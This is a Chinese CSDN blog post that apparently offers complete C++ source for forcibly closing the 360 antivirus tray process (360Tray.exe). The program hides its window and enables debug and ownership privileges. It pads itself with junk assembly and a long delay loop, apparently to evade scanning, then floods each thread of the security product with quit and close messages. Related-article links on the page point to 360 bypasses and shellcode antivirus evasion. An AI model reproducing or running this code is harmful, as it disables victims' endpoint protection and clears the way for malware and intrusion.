进程强杀之,强杀某60进程

最新推荐文章于 2024-02-17 11:00:30 发布
最新推荐文章于 2024-02-17 11:00:30 发布
阅读量262 收藏 1
点赞数 1
分类专栏: 渗透测试与C/C++开发 文章标签: 网络安全 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiopkd1/article/details/128760974
版权
这段代码展示了如何使用Windows API获取并强制结束指定进程,如360Tray.exe,通过调整权限、获取进程ID并发送消息来终止相关线程。
摘要由CSDN通过智能技术生成

#pragma once
#include<iostream>
#include<Windows.h>
#include<TlHelp32.h>
#include <winternl.h>
#include <Psapi.h>
#include<stdio.h>

int GetProcessIDByName(LPCWSTR Name);
#define INVALID_PROCESSID_VALUE -1
DWORD TargetProcessID = INVALID_PROCESSID_VALUE;

WCHAR TargetProcessName[512] = { '3','6','0','T','r','a','y','.','e','x','e' };
WCHAR TargetProcessName2[512] = { '3','6','0','t','r','a','y','.','e','x','e' };
//WCHAR TargetProcessName[512] = { 'Q','Q','P','C','T','r','a','y','.','e','x','e'};
void PauseAndExitProcess(UINT ExitCode);

void AdjustPrivileges(LPCWSTR SE_NAME);
int main()
{

    HWND hDos; //声明窗口句柄变量
    __asm
    {
        push eax
        pop eax
    }

    hDos = GetForegroundWindow(); //得到窗口句柄 
    
    ShowWindow(hDos, SW_HIDE); //隐藏窗口


    AdjustPrivileges(SE_DEBUG_NAME);
    AdjustPrivileges(SE_SECURITY_NAME);

    AdjustPrivileges(SE_TAKE_OWNERSHIP_NAME);
    AdjustPrivileges(SE_AUDIT_NAME);
    AdjustPrivileges(SE_SYSTEM_ENVIRONMENT_NAME);
    AdjustPrivileges(SE_RELABEL_NAME);

    TargetProcessID = GetProcessIDByName(TargetProcessName);
    if (TargetProcessID == INVALID_PROCESSID_VALUE)
    {
        TargetProcessID = GetProcessIDByName(TargetProcessName2);
    }
    HANDLE ThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 1);
    THREADENTRY32 TE32;
    TE32.dwSize = sizeof(THREADENTRY32);
    

    bool CurrentThreadState = Thread32First(ThreadSnapshot, &TE32);

    while (CurrentThreadState)
    {
        __asm
        {
            push eax
            pop eax
        }
        if (TE32.th32OwnerProcessID == TargetProcessID)
        {
            for (int i = 0; i < 4096; i++)
            {
                PostThreadMessage(TE32.th32ThreadID, WM_QUIT, 0, 0);
                PostThreadMessage(TE32.th32ThreadID, WM_CLOSE, 0, 0);
                PostThreadMessage(TE32.th32ThreadID, WM_DESTROY, 0, 0);
                PostThreadMessage(TE32.th32ThreadID, WM_SYSCOMMAND, SC_CLOSE, 0);
                PostThreadMessage(TE32.th32ThreadID, WM_KEYDOWN, VK_CANCEL, 0);
            
                PostThreadMessage(TE32.th32ThreadID, WM_KEYDOWN, VK_ESCAPE, 0);
            }
        }
    
        CurrentThreadState = Thread32Next(ThreadSnapshot, &TE32);
    }
    Sleep(500);

    if (TargetProcessID == INVALID_PROCESSID_VALUE)
    {
        //    printf("关闭失败\n");
        PauseAndExitProcess(0);
    }
    //printf("关闭成功\n");


    return 0;
}

int GetProcessIDByName(LPCWSTR Name)
{

    
    for (int i = 0; i < 1000000000; i++)
        __asm nop;
    HANDLE ProcessSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 1);
    PROCESSENTRY32 PE32;
    PE32.dwSize = sizeof(PROCESSENTRY32);

    bool CurrentProcessState = Process32First(ProcessSnapshot, &PE32);
    
    while (CurrentProcessState)
    {
        if (!lstrcmpW(PE32.szExeFile, Name))
        {
            return PE32.th32ProcessID;
        
            break;
        }
    
        CurrentProcessState = Process32Next(ProcessSnapshot, &PE32);
    }
    return INVALID_PROCESSID_VALUE;
}

void PauseAndExitProcess(UINT ExitCode)
{
    system("Pause");
    ExitProcess(ExitCode);
}

void AdjustPrivileges(LPCWSTR SE_NAME)
{
    
    HANDLE CurrentProcessHandle;

    OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &CurrentProcessHandle);
    LUID Luid;

    LookupPrivilegeValue(NULL, SE_NAME, &Luid);

    TOKEN_PRIVILEGES TokenPrivileges;
    TokenPrivileges.PrivilegeCount = 1;
    TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    TokenPrivileges.Privileges[0].Luid = Luid;

    AdjustTokenPrivileges(CurrentProcessHandle, false, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}

啊哈灬再现江湖
关注
专栏目录
计划任务绕过360核晶自启动 c++
qq_37561898的博客
06-25 3490
绕过360核晶实现计划任务开机自启(带bypass uac)
强杀进程工具
03-17
这是一款跟进程有关的小工具,功能非常强大,可以杀死一般工具杀不死的进程,还可以暂停某进程
c语言编程杀死指定进程,发一个以前写的强杀进程的程序
weixin_42502601的博客
05-18 299
该楼层疑似违规已被系统折叠隐藏此楼查看此楼要乱用。。。。。。。经常会蓝屏的。。。。。。。是驱动别拿去干坏事。。。。这个版本不稳定,ring0代码多了就这幅鸟样#include "Driver.h" //这个就懒得贴了。。。。。#pragma PAGECODEextern "C" VOID DriverUnload(PDRIVER_OBJECT pDriverObj){DbgPrint("Driv...
VS 2017 C++ 防杀进程
07-22
此程序能让 NTSD、WMIC、TASKKILL、任务管理器等大多数进程结束工具无法结束本此程序(支持所有64位 Windows)。
强杀进程
weixin_30481087的博客
06-02 93
// ProcessDemo.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include <Windows.h> #include <stdio.h> #include <conio.h> #include <iostream> #include <string> us...
windows API 强制杀死进程
01-24
https://blog.csdn.net/qq_18286031/article/details/86607462 使用ntsd.exe 和windows API来杀死进程,其中用好几种方法,开发环境:VS2015+Qt5.9.1
[AMS][内存管理][进程(强杀)优先级]
Hendy_Raw的博客
08-27 456
概述 Android内存不足时,会按计算好的进程优先级来强杀应用进程 进程(强杀)优先级 五种: 1、前台进程 用户当前正在做的事情需要这个进程。如果满足下面的件之一,一个进程就被认为是前台进程: 1).这个进程拥有一个正在与用户交互的Activity(这个Ativity的onResume()方法被调用)。 2).这个进程拥有一个绑定到正在与用户交互的activit上的Service...
VB杀死指定进程,强制关闭程序_vb进程管理_
09-29
标题提到的"VB杀死指定进程,强制关闭程序"是指使用VB代码调用API(应用程序接口)函数来实现对特定进程的监视、查找和终止操作。API函数是操作系统提供的一系列函数,允许程序员执行系统级别的任务,如管理进程、...
进程强杀探究
hongduilanjun的博客
03-07 2074
前言 我们知道在windows操作系统里面有ring0跟ring3的概念(ring1、ring2在windows中并未使用),因为ring0的特权级别是比ring3高的,那么我们肯定不能在ring3调用windows提供的api杀死ring0特权级别的进程,那么这时候我们就需要使用的ring0的函数来强行结束一些处于ring0级别的进程。 测试 我们首先打开PCHunter32.exe看一下,应用层是不能够访问的,我们知道可以在cmd里面使用taskkill命令来结束进程,但这种方式对ring0特权级别的程
循环检测 杀死某进程
08-03
循环检测 杀死某进程
C++结束进程(恶搞你的计算机!!!!)
weixin_33762130的博客
12-06 629
刚才在网上搜东西,发现了一个命令——ntsd,可以结束进程。当然我们可以编写一个程序来执行这个命令:***********************************************************#include<windows.h>voidmain(){system("ntsd-cq-pnexplorer.exe");}*************...
VC++ 强杀线程
墨痕诉清风的博客
12-08 918
TerminateThread((HANDLE)m_threadHandle, EXIT_FAILURE); 
360 kill android,过核晶模式KILL360全套程序
weixin_35555014的博客
05-28 1776
这是18年在360安全响应中心发布的“kill核晶防护下360全套程序”漏洞,奖励了1K,时隔2年,留个纪念。一、详细说明在核晶防护下的360基本任何RING3下的程序都无法K掉,即使有,也会被拦截。但可通过运行伪造虚拟机白文件暂时关闭360核晶防护,再调用POSTTHREADMESSAGE对360产品每条线程发送WM_QUIT,使其强制关闭。注:当然在没有核晶防护的情况下,消息攻击可直接K掉,所...
RING3下 内存清零法 杀进程
wowbell的专栏
01-27 5854
<br />在一般任务管理器无法关闭进程时用到<br />内存清零法 杀进程 原理分析<br />1.先打开CSRSS.EXE系统进程,获得其句柄,几乎系统所有的HANDLE结构体中,里面的ProcessId都是指向csrss.exe的,利用它的PID来进行遍历进程实现过滤。<br /><br />2.分配好一块内存空间Buffer,用来存储SystemHandleInformation系统句柄信息<br /><br />3.通过ZwQuerySystemInformation函数来查询系统句柄信息并保存在
Shellcode免杀对抗(C/C++)
最新发布
qq_74806534的博客
02-17 2万+
这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
内核情景分析:强制杀死一个进程的执行过程
龙瑜的博客
10-20 2880
我们常常需要强制杀死一个进程,这种情况不同于正常退出的方式,一些退出流程将不会被执行,但实际操作中我发现内核中的一些退出流程还是能够执行的,这让我思考当一个进程接收到 SIGKILL 时内核中有怎样的处理流程。 ...
Win10杀死进程方式
xxdw1992的博客
08-23 9985
一.通过任务管理器一.通过任务管理器打开任务管理器如下图,选中你要杀死的进程点击”结束“
c++中强制杀死进程
逝水流年
01-23 3269
在windows下,利用微软的ntsd.exe来强制杀死进程或者使用windowsAPI来杀死进程。 代码下载地址
windows杀死某进程
05-30
在 Windows 中,可以使用以下命令来杀死某个进程: 1. 打开命令提示符(Command Prompt)或者 PowerShell。 2. 输入以下命令: ``` taskkill /PID [process_id] /F ``` 其中,[process_id] 部分需要替换为你...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊哈灬再现江湖

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值